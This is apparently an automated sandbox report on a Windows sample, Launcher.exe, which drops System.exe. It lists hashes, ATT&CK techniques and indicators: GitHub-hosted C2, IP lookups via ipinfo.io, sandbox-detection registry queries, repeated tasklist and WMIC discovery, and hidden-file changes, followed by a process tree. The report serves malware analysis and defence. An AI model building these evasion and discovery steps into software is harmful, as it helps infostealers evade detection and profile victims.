12e363e9232c6d8d17a97ad37ef0c55cd7edc88369f92b165b919ac1e8467f2b

Analysis

max time kernel
51s
max time network
161s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
04-04-2024 21:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Launcher.exe
Size

81.5MB
MD5

442c69cd61c620db766ff2e6765d5426
SHA1

1e8d3c52c71344c8e026db4e1a9d3173dbc2a298
SHA256

3c31b92098f561f07db72cf527e512a85f0b10d55cf15193a38012b9d252a8ab
SHA512

a0f07ec0a89b5234e52d7a3c49eb7625f7ea85f5f0e6ffab6363de8a78c5cca05d1946cddd0794ee14d046d70cba1490329748a328eceb0c6a35644ded7e9df8
SSDEEP

1572864:K/WHHr9fleJ1IsiXTq/p0Q4zz6z3yzPgxTTB0KHP4KkqWTE47CW7:K/8L9fleJ1IsiXTqRF4zzs3GEHwNqWT7

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 3 IoCs

pid	Process
3596	System.exe
4948	System.exe
216	System.exe

Loads dropped DLL 12 IoCs

pid	Process
4756	Launcher.exe
4756	Launcher.exe
4756	Launcher.exe
3596	System.exe
3596	System.exe
3596	System.exe
4948	System.exe
216	System.exe
4948	System.exe
4948	System.exe
4948	System.exe
4948	System.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
72	raw.githubusercontent.com
80	raw.githubusercontent.com
82	raw.githubusercontent.com
83	raw.githubusercontent.com
84	raw.githubusercontent.com
93	raw.githubusercontent.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
51	ipinfo.io
52	ipinfo.io

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	System.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	System.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	System.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	System.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	System.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2	System.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	System.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2504	WMIC.exe

Enumerates processes with tasklist 1 TTPs 64 IoCs

Process Discovery

T1057

pid	Process
5228	tasklist.exe
8964	tasklist.exe
9532	tasklist.exe
8028	tasklist.exe
11336	tasklist.exe
8012	tasklist.exe
3120	tasklist.exe
968	tasklist.exe
8284	tasklist.exe
8368	tasklist.exe
1808	tasklist.exe
8032	tasklist.exe
8184	tasklist.exe
8868	tasklist.exe
10828	tasklist.exe
8156	tasklist.exe
8268	tasklist.exe
8216	tasklist.exe
6296	tasklist.exe
7756	tasklist.exe
860	tasklist.exe
9176	tasklist.exe
7496	tasklist.exe
7928	tasklist.exe
7896	tasklist.exe
8844	tasklist.exe
8376	tasklist.exe
8060	tasklist.exe
8028	tasklist.exe
7748	tasklist.exe
7752	tasklist.exe
8152	tasklist.exe
8300	tasklist.exe
8160	tasklist.exe
7632	tasklist.exe
7520	tasklist.exe
7772	tasklist.exe
8512	tasklist.exe
8428	tasklist.exe
7004	tasklist.exe
7888	tasklist.exe
5576	tasklist.exe
1344	tasklist.exe
7592	tasklist.exe
7828	tasklist.exe
1248	tasklist.exe
8520	tasklist.exe
7536	tasklist.exe
8076	tasklist.exe
7708	tasklist.exe
8948	tasklist.exe
7424	tasklist.exe
8020	tasklist.exe
7864	tasklist.exe
7644	tasklist.exe
8228	tasklist.exe
8736	tasklist.exe
8228	tasklist.exe
8152	tasklist.exe
7952	tasklist.exe
7944	tasklist.exe
7912	tasklist.exe
4488	tasklist.exe
8772	tasklist.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
3596	System.exe
3596	System.exe
3596	System.exe
3596	System.exe
3596	System.exe
3596	System.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeSecurityPrivilege	4756	Launcher.exe
Token: SeDebugPrivilege	4644	tasklist.exe
Token: SeShutdownPrivilege	3596	System.exe
Token: SeCreatePagefilePrivilege	3596	System.exe
Token: SeShutdownPrivilege	3596	System.exe
Token: SeCreatePagefilePrivilege	3596	System.exe
Token: SeIncreaseQuotaPrivilege	1940	WMIC.exe
Token: SeSecurityPrivilege	1940	WMIC.exe
Token: SeTakeOwnershipPrivilege	1940	WMIC.exe
Token: SeLoadDriverPrivilege	1940	WMIC.exe
Token: SeSystemProfilePrivilege	1940	WMIC.exe
Token: SeSystemtimePrivilege	1940	WMIC.exe
Token: SeProfSingleProcessPrivilege	1940	WMIC.exe
Token: SeIncBasePriorityPrivilege	1940	WMIC.exe
Token: SeCreatePagefilePrivilege	1940	WMIC.exe
Token: SeBackupPrivilege	1940	WMIC.exe
Token: SeRestorePrivilege	1940	WMIC.exe
Token: SeShutdownPrivilege	1940	WMIC.exe
Token: SeDebugPrivilege	1940	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1940	WMIC.exe
Token: SeRemoteShutdownPrivilege	1940	WMIC.exe
Token: SeUndockPrivilege	1940	WMIC.exe
Token: SeManageVolumePrivilege	1940	WMIC.exe
Token: 33	1940	WMIC.exe
Token: 34	1940	WMIC.exe
Token: 35	1940	WMIC.exe
Token: 36	1940	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1940	WMIC.exe
Token: SeSecurityPrivilege	1940	WMIC.exe
Token: SeTakeOwnershipPrivilege	1940	WMIC.exe
Token: SeLoadDriverPrivilege	1940	WMIC.exe
Token: SeSystemProfilePrivilege	1940	WMIC.exe
Token: SeSystemtimePrivilege	1940	WMIC.exe
Token: SeProfSingleProcessPrivilege	1940	WMIC.exe
Token: SeIncBasePriorityPrivilege	1940	WMIC.exe
Token: SeCreatePagefilePrivilege	1940	WMIC.exe
Token: SeBackupPrivilege	1940	WMIC.exe
Token: SeRestorePrivilege	1940	WMIC.exe
Token: SeShutdownPrivilege	1940	WMIC.exe
Token: SeDebugPrivilege	1940	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1940	WMIC.exe
Token: SeRemoteShutdownPrivilege	1940	WMIC.exe
Token: SeUndockPrivilege	1940	WMIC.exe
Token: SeManageVolumePrivilege	1940	WMIC.exe
Token: 33	1940	WMIC.exe
Token: 34	1940	WMIC.exe
Token: 35	1940	WMIC.exe
Token: 36	1940	WMIC.exe
Token: SeShutdownPrivilege	3596	System.exe
Token: SeCreatePagefilePrivilege	3596	System.exe
Token: SeShutdownPrivilege	3596	System.exe
Token: SeCreatePagefilePrivilege	3596	System.exe
Token: SeShutdownPrivilege	3596	System.exe
Token: SeCreatePagefilePrivilege	3596	System.exe
Token: SeShutdownPrivilege	3596	System.exe
Token: SeCreatePagefilePrivilege	3596	System.exe
Token: SeShutdownPrivilege	3596	System.exe
Token: SeCreatePagefilePrivilege	3596	System.exe
Token: SeDebugPrivilege	7416	tasklist.exe
Token: SeDebugPrivilege	7384	tasklist.exe
Token: SeDebugPrivilege	7488	tasklist.exe
Token: SeDebugPrivilege	7440	tasklist.exe
Token: SeDebugPrivilege	7480	tasklist.exe
Token: SeDebugPrivilege	7460	tasklist.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4756 wrote to memory of 3596	4756	Launcher.exe	93
PID 4756 wrote to memory of 3596	4756	Launcher.exe	93
PID 3596 wrote to memory of 3992	3596	System.exe	95
PID 3596 wrote to memory of 3992	3596	System.exe	95
PID 3992 wrote to memory of 4644	3992	cmd.exe	97
PID 3992 wrote to memory of 4644	3992	cmd.exe	97
PID 3596 wrote to memory of 4948	3596	System.exe	98
PID 3596 wrote to memory of 4948	3596	System.exe	98
PID 3596 wrote to memory of 4948	3596	System.exe	98
PID 3596 wrote to memory of 4948	3596	System.exe	98
PID 3596 wrote to memory of 4948	3596	System.exe	98
PID 3596 wrote to memory of 4948	3596	System.exe	98
PID 3596 wrote to memory of 4948	3596	System.exe	98
PID 3596 wrote to memory of 4948	3596	System.exe	98
PID 3596 wrote to memory of 4948	3596	System.exe	98
PID 3596 wrote to memory of 4948	3596	System.exe	98
PID 3596 wrote to memory of 4948	3596	System.exe	98
PID 3596 wrote to memory of 4948	3596	System.exe	98
PID 3596 wrote to memory of 4948	3596	System.exe	98
PID 3596 wrote to memory of 4948	3596	System.exe	98
PID 3596 wrote to memory of 4948	3596	System.exe	98
PID 3596 wrote to memory of 4948	3596	System.exe	98
PID 3596 wrote to memory of 4948	3596	System.exe	98
PID 3596 wrote to memory of 4948	3596	System.exe	98
PID 3596 wrote to memory of 4948	3596	System.exe	98
PID 3596 wrote to memory of 4948	3596	System.exe	98
PID 3596 wrote to memory of 4948	3596	System.exe	98
PID 3596 wrote to memory of 4948	3596	System.exe	98
PID 3596 wrote to memory of 4948	3596	System.exe	98
PID 3596 wrote to memory of 4948	3596	System.exe	98
PID 3596 wrote to memory of 4948	3596	System.exe	98
PID 3596 wrote to memory of 4948	3596	System.exe	98
PID 3596 wrote to memory of 4948	3596	System.exe	98
PID 3596 wrote to memory of 4948	3596	System.exe	98
PID 3596 wrote to memory of 4948	3596	System.exe	98
PID 3596 wrote to memory of 4948	3596	System.exe	98
PID 3596 wrote to memory of 216	3596	System.exe	99
PID 3596 wrote to memory of 216	3596	System.exe	99
PID 3596 wrote to memory of 4700	3596	System.exe	100
PID 3596 wrote to memory of 4700	3596	System.exe	100
PID 4700 wrote to memory of 1940	4700	cmd.exe	103
PID 4700 wrote to memory of 1940	4700	cmd.exe	103
PID 3596 wrote to memory of 4920	3596	System.exe	104
PID 3596 wrote to memory of 4920	3596	System.exe	104
PID 3596 wrote to memory of 1948	3596	System.exe	105
PID 3596 wrote to memory of 1948	3596	System.exe	105
PID 3596 wrote to memory of 2612	3596	System.exe	106
PID 3596 wrote to memory of 2612	3596	System.exe	106
PID 3596 wrote to memory of 3604	3596	System.exe	110
PID 3596 wrote to memory of 3604	3596	System.exe	110
PID 3596 wrote to memory of 1624	3596	System.exe	111
PID 3596 wrote to memory of 1624	3596	System.exe	111
PID 3596 wrote to memory of 2732	3596	System.exe	112
PID 3596 wrote to memory of 2732	3596	System.exe	112
PID 3596 wrote to memory of 3568	3596	System.exe	115
PID 3596 wrote to memory of 3568	3596	System.exe	115
PID 3596 wrote to memory of 2432	3596	System.exe	117
PID 3596 wrote to memory of 2432	3596	System.exe	117
PID 3596 wrote to memory of 4296	3596	System.exe	120
PID 3596 wrote to memory of 4296	3596	System.exe	120
PID 3596 wrote to memory of 4412	3596	System.exe	121
PID 3596 wrote to memory of 4412	3596	System.exe	121
PID 3596 wrote to memory of 4620	3596	System.exe	122
PID 3596 wrote to memory of 4620	3596	System.exe	122

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
8540	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4756
- C:\Users\Admin\AppData\Local\Temp\2e3rU903Ce3XSSz2WFWcnXhx8v8\System.exe
  C:\Users\Admin\AppData\Local\Temp\2e3rU903Ce3XSSz2WFWcnXhx8v8\System.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3992
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4644
- - C:\Users\Admin\AppData\Local\Temp\2e3rU903Ce3XSSz2WFWcnXhx8v8\System.exe
    "C:\Users\Admin\AppData\Local\Temp\2e3rU903Ce3XSSz2WFWcnXhx8v8\System.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\megamindnva" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1692 --field-trial-handle=1696,i,4240940651949948143,4876623791915125659,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:4948
- - C:\Users\Admin\AppData\Local\Temp\2e3rU903Ce3XSSz2WFWcnXhx8v8\System.exe
    "C:\Users\Admin\AppData\Local\Temp\2e3rU903Ce3XSSz2WFWcnXhx8v8\System.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\megamindnva" --mojo-platform-channel-handle=1728 --field-trial-handle=1696,i,4240940651949948143,4876623791915125659,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=NaN get ExecutablePath"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4700
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where processid=NaN get ExecutablePath
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4920
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1948
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:7384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2612
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:7480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3604
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:7460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1624
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:7440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2732
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:7496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3568
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2432
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:7520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4296
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4412
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4620
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:7536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2016
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2492
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2668
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:7592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4392
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3724
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:7632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1704
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2608
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:7424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1848
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:8040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1456
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:7756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3800
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3384
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5068
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4844
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:444
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4904
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:8284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4692
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:8028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3592
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:7888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3696
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1356
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3852
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:7896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4992
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5064
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:460
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2772
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:8352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1320
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1344
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:8152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4480
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3260
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:7416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4372
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:8060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:408
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1556
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3808
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3208
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:7952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4660
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4560
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:8160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:868
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:7708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1760
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:7912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4112
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1780
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4556
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:8168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3644
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:7644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4128
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:7828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2172
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:4176
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2116
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1840
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2864
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:8360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:372
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:8068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:5052
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:7944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3728
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:8292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3632
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3024
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:8176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3356
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:8020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3984
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:7488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1776
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:8184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:2444
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:8228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1560
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3612
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:3324
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:976
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      PID:7788
